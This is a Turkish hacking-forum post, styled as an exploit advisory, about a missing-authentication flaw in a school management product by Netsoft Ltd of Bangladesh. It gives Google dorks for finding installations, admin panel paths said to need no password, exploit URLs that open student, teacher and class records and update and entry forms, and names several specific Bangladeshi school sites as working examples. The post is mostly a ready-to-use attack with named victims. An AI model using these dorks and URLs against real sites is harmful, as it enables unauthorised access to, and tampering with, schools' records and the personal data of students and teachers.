Konuyu Oyla:
  • Toplam: 1 Oy - Ortalama: 5
  • 1
  • 2
  • 3
  • 4
  • 5
   
Konu: WordPress Developed by Netsoft Limited Impr Auth Vuln
KingSkrupellos
*
avatar
Hacktivist
Durum: Çevrimdışı
Seviye Puanı: 56
Yaşam Puanı: 1,382 / 1,382
Deneyim: 30 / 100
Rep Sayısı: 2826
Mesaj Sayısı: 6456
Üyelik Tarihi: 21.08.2013
     
Yorum: #1
WordPress Developed by Netsoft Limited Impr Auth Vuln
05.09.2018 01:22
################################################################################​#################

# Exploit Title : WordPress Datacenter Developed by Netsoft Limited Software Development Bangladesh Improper Authentication Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 05/09/2018
# Vendor Homepages : netsoft.com.bd ~ netsoft.net ~ netsoft-ltd.net ~ linkedin.com/company/net-soft-ltd
# Tested On : Windows
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-284 [Improper Access Control ] - CWE-287 - [ Improper Authentication ]

################################################################################​#################

# WordPress Datacenter Developed by Netsoft Limited Bangladesh Improper Authentication Vulnerability

# Google Dorks :

intext:''Datacenter :: A Product of Netsoft Ltd''

intext:''Copyright © Netsoft Ltd., all rights reserved''

intext:''Developed by : Netsoft Limited.''

# Admin Control Panel Path URL Links =>

/nsAdmin/index.php
/nsAdmin/index.php?url=./login.php
/wp-login.php

It does not require any username and password.

Enter this links after the Target URL.

# Exploits :

/nsAdmin/index.php?url=view_student.php&division=0&dis3=0
/nsAdmin/index.php?url=teacher_details.php&division=0&dis3=0
/nsAdmin/index.php?url=class_details.php&division=0&dis3=0
/nsAdmin/index.php?url=update_teacher.php&teacher_id=4495
/nsAdmin/index.php?url=teacher_entry.php
/nsAdmin/index.php?url=class_entry.php

################################################################################​#################

# Example Site => hmahdm.edu.bd/nsAdmin/index.php?url=teacher_details.php&division=0&dis3=0 => [ Proof of Concept ] => archive.is/BBwsZ

mukm.edu.bd/nsAdmin/index.php?url=teacher_details.php&teacher_id=3
jpphs.edu.bd/nsAdmin/index.php?url=class_details.php&division=0&dis3=0
iahs1988.edu.bd/nsAdmin/index.php?url=teacher_details.php&division=0&dis3=0
mghs1992.edu.bd/nsAdmin/index.php?url=teacher_details.php&division=0&dis3=0

################################################################################​#################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

################################################################################​#################

# Cyberizm Digital Security Technological Turkish Moslem Army #
# İnsanda bir organ vardır. Eğer o sağlıklı ise bütün vücut sağlıklı olur;
eğer o bozulursa bütün vücut bozulur. Dikkat edin! O, kalptir.
[ Hz.Muhammed S.A.V ] #


Alinti



1 Ziyaretçi